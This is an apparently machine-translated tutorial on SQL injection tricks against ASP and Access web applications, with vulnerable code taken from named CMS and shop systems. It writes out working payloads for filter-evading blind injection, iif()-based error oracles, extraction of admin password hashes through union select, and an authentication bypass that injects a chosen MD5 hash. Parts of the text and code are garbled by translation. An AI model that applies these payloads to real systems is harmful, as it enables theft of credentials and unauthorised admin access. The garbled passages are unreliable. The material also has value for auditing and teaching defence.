ASP + access SQL Injection tips

With the upgrade of web security hot spots, the code security of web applications is gradually flourishing. More and more security personnel are investing in this field, and more application code vulnerabilities are exposed. Relatively speaking, there are fewer people studying asp application code security. After all, asp is not as flexible and changeable as php, and there are only a few types of vulnerabilities, this article will share some tips on SQL injection and audit based on the ASP + ACCESS environment. Of course, there are still many tips. Please add them ~.
0x01 when blind injection suffers filtering "<", ">", "="
I have read some asp system code, some programmers use only "<", ">", "=", and single quotes to defend against SQL injection, so that they cannot guess data, although we do not know that there are many bypass methods for such filtering, the first thing we think of is to use "between and". Of course, we will not discuss "between and" here. We will provide another tips, such as the following SQL statement:

select * from table where id=SQL

The SQL is a part that we can construct. At the same time, this page filters the obtained parameters such as "<", ">", "=", and cannot use union for injection, without using "between and", we construct the following structure:

select * from table where id=1 and (select asc(mid(username,1,1)) from admin where asc(mid(username,1,1)) in(97))

The in () statement is used to determine whether the first character of the administrator user name is a, and 97 is the ascii code of Character.
0x02 application of iif () function in access Injection
For some Special injections, the iif () function under ACCESS is still quite useful. For example, when the classic "and 1 = 1" and "and 1 = 2" are used to judge the injection, when no difference is returned on the page, the time difference cannot be used for injection in the access database like mysql, And the iif ()
The returned "no difference page" can be differentiated ......, Here, I take an injection point in the southern data enterprise website management system v16 as an example to see the code:

Set rs = server. createobject ("adodb. recordset ") SQL =" select * from Southidc _ "& request (" Range ") &" Sort where ViewFlag and ParentID = "& ParentID &" order by ID asc "rs. open SQL, conn, 1, 1 if conn.exe cute ("select ID from Southidc _" & request ("Range") & "Sort Where ViewFlag and ParentID = 0 "). eof then response. write "no relevant information" else do while not rs. eof

Careful friends can find the injection point at a Glance. The request ("Range") contains two SQL statements. The injection point is special. You can submit the table name, however, because two SQL statements are introduced, it is difficult to use them. Because the access database does not have a annotator, union queries must be used to close the statement. However, because two SQL statements are introduced, joint query execution:

select ID from Southidc_"&request("Range")&"Sort Where ViewFlag and ParentID=0

If the number of fields does not match, an error is reported because "select ID from Southidc _" queries a field, and the previous SQL "select * from Southidc _" queries multiple fields, therefore, no matter how we construct an SQL statement, we cannot make the number of fields equal. Here we use the iif () function of access to forcibly report an error. When the query is true, when the number of fields does not match, an error is reported. When the query is false, the iif () function is used to forcibly report another error, so that blind injection can be performed. For example, the submitted Range is:

NewsSort where 2=iif((1=1),2,'a') union select * from Southidc_News

Replace 1 = 1 with an SQL injection statement. For example, if the Range is submitted:

NewsSort where 2=iif(((select top 1 asc(mid(AdminName,1,1)) from [Southidc_Admin])=97),2,'a') union select * from Southidc_News

An error is reported at this time. 1:

Determine whether the first character of the administrator user name is a. If the query is true, an error is returned. If the query is false, for example, we submit the statement:

NewsSort where 2=iif(((select top 1 asc(mid(AdminName,1,1)) from [Southidc_Admin])=98),2,'a') union select * from Southidc_News

The iif function is used to forcibly report an error.

2 = 'A' forced type conversion will certainly report an error ...... "The data type in the standard expression does not match ".
0x03 ACCESS"
When it comes to ACCESS "Database explosion", many friends may think of the classic vulnerability of access's % 5c, but this vulnerability is not mentioned here, but similar to mssql and mysql, database Data is exposed through an error. See a piece of code for a mall system:

<% Server. scriptTimeout = 20Response. charset = "gb2312" scid = Request ("scid") if scid <> "" Thenset Fr = lodo_Execute ("Select region as Gid, region as GQuantity, Lodo_OrderForm.OrderState as OrderState, lodo_OrderForm.OrderPayState as OrderPayState, Lodo_OrderForm.Ordernumber as Ordernumber from Lodo_ShopingCar, Lodo_OrderForm where Lodo_OrderForm.Ordernumber = region And region = "& scid) If Not (Fr. eof Or Fr. bof) then' determine whether to pay if FR ("OrderState") = 4 Or FR ("OrderState") = 5 Or FR ("OrderPayState") = 1 ThenResponse. write"

• "
  Set Rs = lodo_Execute ("Select Top" & FR ("GQuantity") & "Contents from Lodo_CGoods where Status = 1 And PurchaseOrder = '" & FR ("Ordernumber ") & "'And GoodsID =" & FR ("Gid "))
  CGnum = 0
  Do While Not Rs. Eof And CGnum

Note the following code:

if Frs("OrderState")=4 Or Frs("OrderState")=5 Or Frs("OrderPayState")=1 Then

Compare the data in the database ("OrderState") with 4! The problem is that, if we inject data through the union query and return the result through the FR ("OrderState"), the program reports an error when the execution reaches the WordPress ("OrderState") = 4, at the same time, Microsoft displays the error data in a friendly way. For example, in the preceding SQL statement, we submit the following scid:

1 union select 1,2,adminpass,4,5 from lodo_adminuser

If the returned result is an administrator password hash by controlling the WordPress ("OrderState"), an error is reported on the page when the result is 4 ("OrderState.

Although there are not many such codes, there are still some, which is also a weakness.

0x04 blood cases caused by "on error resume next"
For the early physical path vulnerability in the access database of % 5c, many programmers solve the problem by connecting to the database file conn. add a sentence error code in asp to solve the problem. Of course, this method fixes the vulnerability, but it may cause other problems. See the Code:

conn.asp:<%   on error resume next   connstr = "Provider=microsoft.jet.oledb.4.0;data source="&server.MapPath("inc/db.mdb")set conn = server.CreateObject("adodb.connection")   conn.open connstr   %>

Then we can see the code for test. asp:

<%   id = request("id")   id = cint(id)   set rs = server.CreateObject("adodb.recordset")   sql = "select * from news where id="&id  rs.open sql,conn,1,3   response.write rs("news")   rs.close   set rs = nothing   %>   <%set conn = nothing%>  

This Code does not seem to have any vulnerability. In fact, it is caused by SQL injection. asp does not add the "on error resume next" Fault Tolerance statement. If the submitted id is not int type, test. asp page will report an error and terminate the execution, but if conn. asp has the "on error resume next" error tolerance statement, test. the asp page does not report errors, but skips the error statement id = cint (id) to continue execution! The final result is filter failure, SQL injection, and logical vulnerabilities.
0x05 new universal Login Password
"Universal password" is believed to be familiar to intrusion-related friends. For example, "or" = "or" and "or" = ". The vulnerability principle is simple, for example, the following SQL statement:

sql = "select * from admin where UserName='"&username&"' And PassWord='"& password &"'"

The username and password variables are controllable. When we submit the username as "'or'' =' "And the password is arbitrary, we can directly bypass the verification and log on to the system. In order to deal with such vulnerabilities, many programmers use the following code:

<%dim LoginName,LoginPassword,AdminName,Password,AdminPurview,Working,UserName,rs,sql,mycodeLoginName=trim(request.form("LoginName"))LoginPassword=Md5(request.form("LoginPassword"))mycode = trim(request.form("code"))set rs = server.createobject("adodb.recordset")sql="select * from admin where AdminName='"&LoginName&"'"rs.open sql,conn,1,3if rs.eof then   response.write ""   response.endelse   AdminName=rs("AdminName")   Password=rs("Password")   AdminPurview=rs("AdminPurview")   Working=rs("Working")   UserName=rs("UserName")end ifif LoginPassword<>Password then   response.write ""   response.endend if 

'The login successful code is omitted
The above code solves the "universal Password" Login vulnerability, but does not fundamentally solve the SQL Injection problem. Although the Password submitted by the user and the database query return the Password rs ("Password ") after comparison, if we can use SQL to control the returned results of rs ("Password"), we can use the "new universal Password" to log in. For example, the above Code, loginName is submitted as follows:

' union select 1,2,'268a5c2004f54de708ee2ce0dac3c411',4,5,6 from admin where '1'='1

The Password is my5t3ry and you can directly log on to the system. 268a5c2004f54de708ee2ce0dac3c411 is the MD5 encrypted hash of my5t3ry. The number of fields after union select must match the admin table, and the Password must be in column 3rd, therefore, 3 is replaced with MD5, and rs ("Password") returned results are controlled through SQL injection, implementing the "new universal Password ".
0x06 SQL statements without spaces
When SQL injection is performed, spaces may be filtered. For example, if a normal SQL statement select id from table is filtered and becomes selectidfromtable, all statements are squeezed into one block, leading to injection failure. In access, you can use () [] to avoid spaces. The preceding statement can be written as follows:

select(id)from[table]where[id]=1

In this way, space is avoided. In addition, space can be replaced by characters such as % 09 and % 0D0A in mssql. access is also feasible.
Finally, I would like to share some tips on SQL injection and auditing in the ASP + ACCESS environment. You are welcome to make a brick. In addition, this article references articles by Daniel such as oldjun, gogorq, and lonely hedgehog, thank you here